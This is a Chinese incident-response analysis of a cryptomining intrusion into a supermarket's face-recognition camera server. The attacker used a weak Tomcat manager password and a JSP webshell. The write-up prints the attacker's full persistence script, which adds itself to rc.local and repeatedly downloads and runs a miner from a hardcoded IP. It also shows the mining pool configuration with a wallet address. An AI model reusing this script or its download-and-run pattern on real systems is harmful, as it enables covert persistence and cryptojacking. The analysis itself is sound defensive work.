针对智能超市摄像头的攻击链分析

0x00、前言

伴随着数字化浪潮在智能超市的应用，越来越多的线下门店都开始使用智能系统，包括：人脸识别系统、小程序商城、会员营销系统、以及支付平台。人脸识别，可以帮助商家识别vip用户，识别进入门店人脸表情分析满意度，刷脸支付，然后通过小程序商城线上线下联动，完成整个销售流程。后端管控中台，做精准营销等。但是这一切都离不开后端IT系统的支持。

0x01、入侵排查

本次被入侵的系统为承载人脸识别的摄像头系统，在态势感知产品监控告警中，我们发现tomcat目录下出现了webshell。同时，还有对外连接的挖矿IP地址。

目录为：usr/⁨local⁩/⁨tomcat⁩/⁨webapps⁩/⁨mTQf/m.jsp

具体查看后发现是jsp File Browser。上传、下载文件功能，为以后入侵打下基础。

列举进程信息后，我们发现：

root     10177  0.0  0.0 106336  1632 ?        S     2018   0:11 /bin/bash ./systems
root     13156  0.0  0.0 107148  2524 ?        S    Mar18   0:27 /bin/sh /tmp/javax/config.sh

同时，我们在tmp目录当中发现了下载脚本。

下载脚本如下：

脚本大致的意思：是否存在重复下载检测，添加启动项，一直监控lsys文件释放存在，如果没有去http://103.55.13.68:13333/lsys下载程序，然后添加执行权限。运行lsys elf文件。

#!/bin/bash

if [ "sh /etc/chongfu.sh &" = "$(cat /etc/rc.local | grep /etc/chongfu.sh | grep -v grep)" ]; then
    echo ""
else
    echo "sh /etc/chongfu.sh &" >> /etc/rc.local
fi

while [ 1 ]; do
    Centos_sshd_killn=$(ps aux | grep "/tmp/lsys" | grep -v grep | wc -l)
    if [[ $Centos_sshd_killn -eq 0 ]]; then
        if [ ! -f "/tmp/lsys" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P . http://103.55.13.68:13333/lsys
                ./wget -P /tmp/  http://103.55.13.68:13333/lsys &> /dev/null
                chmod 755 /tmp/lsys
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
        /tmp/lsys &
        #./lsys &
    elif [[ $Centos_sshd_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "lsys" | grep -v grep | awk '{print $2}'); do
            Centos_sshd_killn=$(($Centos_sshd_killn-1))
            if [[ $Centos_sshd_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi

    Centos_ssh_killn=$(ps aux | grep "/tmp/lsys" | grep -v grep | wc -l)
    if [[ $Centos_ssh_killn -eq 0 ]]; then
        if [ ! -f "/tmp/lsys" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P .  http://103.55.13.68:13333/lsys
                ./wget -P /tmp/  http://103.55.13.68:13333/lsys &> /dev/null
                chmod 755 /tmp/lsys
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
        /tmp/lsys &
        #./lsys &
    elif [[ $Centos_ssh_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "lsys" | grep -v grep | awk '{print $2}'); do
            Centos_ssh_killn=$(($Centos_ssh_killn-1))
            if [[ $Centos_ssh_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi

    sleep 900
done

下载了lsys文件分析后：

1、沙箱分析结果：

访问的恶意域名正好和态势感知系统汇报的域名相同。同时下载挖矿配置脚本。

2、矿池地址：

"pools": [
        {
            "url": "pool.supportxmr.com:3333",
            "user": "46ARamtqSyNEtvXJRATeCWF5KgpzufsXPjgrDn6UA3wahsaU1nysFQoYs9q6xa484o83z4p28Msr9V4z8fXLaXfS1PXfpuo",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": -1,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null
        }

3、同时程序伪造成ssdh、sshd2和sshk。

0x02、攻击链总结

和用户确认过，Tomcat服务器web管理系统登陆密码为123456，恶意人员登录web控制台后，上传了JSP File Browser，然后通过JSP File Browser上传了下载sh脚本并且执行。脚本执行后下载了lsys二进制恶意程序挖矿以及僵尸网络外联。